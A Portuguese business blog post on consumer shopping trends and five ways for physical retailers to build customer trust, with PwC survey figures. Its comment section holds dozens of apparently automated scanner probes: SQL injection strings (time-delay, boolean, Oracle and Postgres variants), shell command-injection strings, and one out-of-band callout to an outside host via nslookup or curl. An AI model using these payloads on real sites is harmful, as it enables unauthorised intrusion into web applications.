Comportamento do consumidor: o que você deve saber sobre as tendências de compras dos seus clientes

por| 27 de novembro de 2019| 42 comentários

Se você acredita que a vida das lojas físicas está perto do fim, sugerimos rever os seus conceitos. É claro que não dá para negar que o ambiente online conquistou um espaço importante na forma como as pessoas adquirem produtos ou serviços. Mas, de acordo com a pesquisa Global Consumer Insights Survey, produzida pela PwC, 61% dos consumidores ainda preferem ter a experiência de ir a loja física. Então, que tal começar agora a olhar com mais carinho para o seu PDV?

Por que as pessoas gostam de comprar nas lojas físicas

Em geral, o cliente se desloca para a loja física pela experiência de ver o produto de perto. Além disso, no contato pessoal e humanizado com o atendente, existe a possibilidade de obter mais descontos ou facilidades no pagamento.

Confiança na marca é importante no momento da compra

De acordo com a pesquisa da PwC, 40% dos brasileiros afirmou que, após verificarem o preço de um produto ou serviço, checam a credibilidade da marca antes de fechar negócio. Na sequência, consideram a boa localização (opinião de 30% dos entrevistados), disponibilidade de produtos (29%), rapidez e confiabilidade na entrega (28%), disponibilidade de produtos difíceis de encontrar (25%), existência de avaliação online positiva de outros clientes (25%) e possibilidade de verificar em ambiente online se o produto está disponível na loja física (20%). 

Cinco formas de conquistar a confiança do cliente

O cliente que confia em você hoje pode decidir fazer negócio com a concorrência amanhã. Isso acontece porque o consumidor está cada vez mais ciente sobre o seu poder e direitos dentro de uma negociação. Dessa forma, mantenha-o próximo com cinco boas práticas:

1 – Cuide da reputação no ambiente online

Invista em um serviço especializado para monitorar e responder comentários sobre a sua marca em sites de reclamações e nas redes sociais. Isso porque, de acordo com o estudo da PwC, embora a confiança na marca desempenhe um papel importante na decisão dos consumidores sobre onde comprar, eles dependem muito de opiniões de outras pessoas para se decidir. Por exemplo, 46% dos brasileiros encontram nas redes sociais a inspiração para compras. 

2 – Zele pelo seu PDV

Se o seu cliente decidiu entrar no seu varejo garanta que ele tenha uma ótima experiência para permanecer mais tempo, voltar e indicar seu estabelecimento para outras pessoas. Como fazer isso? Comece cuidando da limpeza e organização de todos os espaços, desde o estacionamento e a entrada. Depois, disponha os produtos em uma ordem lógica e invista em climatizadores, som ambiente agradável e pontos estratégicos de iluminação. Não esqueça de priorizar a acessibilidade.

3 – Treine a equipe

Sua equipe deve ser “agressivamente gentil”, como explica Thomas Connellan no livro “Nos Bastidores da Disney”. Na prática, seus colaboradores não precisam ficar ao lado dos clientes o tempo todo, mas demonstrar que estão atentos à sua presença e verdadeiramente dispostos a resolver suas questões.

4 – Forneça informações corretas

Na produção de cartaz de preço ou oferta, tenha a certeza de que o conteúdo gera informação e não confusão, com padronização e sem erros de digitação. Para garantir a perfeição das peças, marcas de diferentes portes têm aderido ao cartazista eletrônico, um programa para fazer cartaz em ambiente online.  

É fundamental, também, que os valores expostos estejam de acordo com aquele que está no sistema e será cobrado no caixa. Verifique, ainda, se o seu controle de estoque está automatizado e funcionando com eficiência. Afinal, em tempos de concorrência acelerada, não dá para deixar de vender porque o cliente não encontrou o produto que desejava na prateleira, não é mesmo? 

5 – Tenha um calendário promocional

Sabe aqueles períodos comemorativos relacionados a eventos esportivos, aniversário da marca, festas temáticas da região e estações do ano, além dos mais tradicionais, como Natal, Ano Novo, Dia das Mães, Dia dos Namorados, Dia dos Pais, Dia das Crianças, Dia do Cliente, Black Friday e Páscoa? Pois bem, todos devem estar no seu calendário promocional. A ideia é que com ele você faça um levantamento dos indicadores de vendas e tenha insumos para definir estratégias de preço, necessidades de compra, campanhas de marketing e contratação ou treinamento de colaboradores.

Com a equipe certa, as tecnologias adequadas e um PDV eficiente os clientes terão cada vez mais motivos para retornar.

42 comentários

  1. 2e 1$
    LmMqtzme

    1

  2. 2e 1$
    response.write(9380296*9016808)

    1

  3. 2e 1$
    LmMqtzme

    response.write(9362123*9634074)

  4. 2e 1$
    LmMqtzme&echo apnnuq$()\ valixt\nz^xyu||a #' &echo apnnuq$()\ valixt\nz^xyu||a #|" &echo apnnuq$()\ valixt\nz^xyu||a #

    1

  5. 2e 1$
    LmMqtzme

    1

  6. 2e 1$
    LmMqtzme

    &echo sggfji$()\ sgatnz\nz^xyu||a #’ &echo sggfji$()\ sgatnz\nz^xyu||a #|” &echo sggfji$()\ sgatnz\nz^xyu||a #

  7. 2e 1$
    LmMqtzme

    |(nslookup -q=cname hitygfgrdkksw3aa78.bxss.me||curl hitygfgrdkksw3aa78.bxss.me)

  8. 2e 1$
    LmMqtzme

    ‘”()

  9. 2e 1$
    LmMqtzme

    1’||sleep(27*1000)*shlqgr||’

  10. 2e 1$
    LmMqtzmeLPDLrP7y

    1

  11. 2e 1$
    LmMqtzme' AND 2*3*8=6*8 AND 'Iw87'='Iw87

    1

  12. 2e 1$
    LmMqtzme-1 waitfor delay '0:0:15' --

    1

  13. 2e 1$
    LmMqtzmeiR5zeu0N'; waitfor delay '0:0:15' --

    1

  14. 2e 1$
    LmMqtzme'"

    1

  15. 2e 1$
    LmMqtzme

    1

  16. 2e 1$
    LmMqtzme

    1

  17. 2e 1$
    LmMqtzme

    1

  18. 2e 1$
    LmMqtzme

    1

  19. 2e 1$
    LmMqtzme

    1

  20. 2e 1$
    LmMqtzme

    13crVkxWM

  21. 2e 1$
    LmMqtzme

    1*1

  22. 2e 1$
    LmMqtzme

    -1 OR 3+918-918-1=0+0+0+1

  23. 2e 1$
    LmMqtzme

    1*if(now()=sysdate(),sleep(15),0)

  24. 2e 1$
    LmMqtzme

    10’XOR(1*if(now()=sysdate(),sleep(15),0))XOR’Z

  25. 2e 1$
    LmMqtzme

    10″XOR(1*if(now()=sysdate(),sleep(15),0))XOR”Z

  26. 2e 1$
    LmMqtzme

    (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

  27. 2e 1$
    LmMqtzme

    1-1; waitfor delay ‘0:0:15’ —

  28. 2e 1$
    LmMqtzme

    1-1); waitfor delay ‘0:0:15’ —

  29. 2e 1$
    LmMqtzme

    1-1 waitfor delay ‘0:0:15’ —

  30. 2e 1$
    LmMqtzme

    1JF6ZjrEM’; waitfor delay ‘0:0:15’ —

  31. 2e 1$
    LmMqtzme

    1-1 OR 868=(SELECT 868 FROM PG_SLEEP(15))–

  32. 2e 1$
    LmMqtzme

    1-1) OR 610=(SELECT 610 FROM PG_SLEEP(15))–

  33. 2e 1$
    LmMqtzme

    1-1)) OR 342=(SELECT 342 FROM PG_SLEEP(15))–

  34. 2e 1$
    LmMqtzme

    1QdWA4OI3′ OR 688=(SELECT 688 FROM PG_SLEEP(15))–

  35. 2e 1$
    LmMqtzme

    1l0ODbWHD’) OR 763=(SELECT 763 FROM PG_SLEEP(15))–

  36. 2e 1$
    LmMqtzme

    1FfT2pFWa’)) OR 493=(SELECT 493 FROM PG_SLEEP(15))–

  37. 2e 1$
    LmMqtzme

    1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  38. 2e 1$
    LmMqtzme

    1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

  39. 2e 1$
    LmMqtzme

    1

  40. 2e 1$
    LmMqtzme

    1

  41. 2e 1$
    LmMqtzme

    1

Deixe um comentário

Seu endereço de e-mail não será publicado.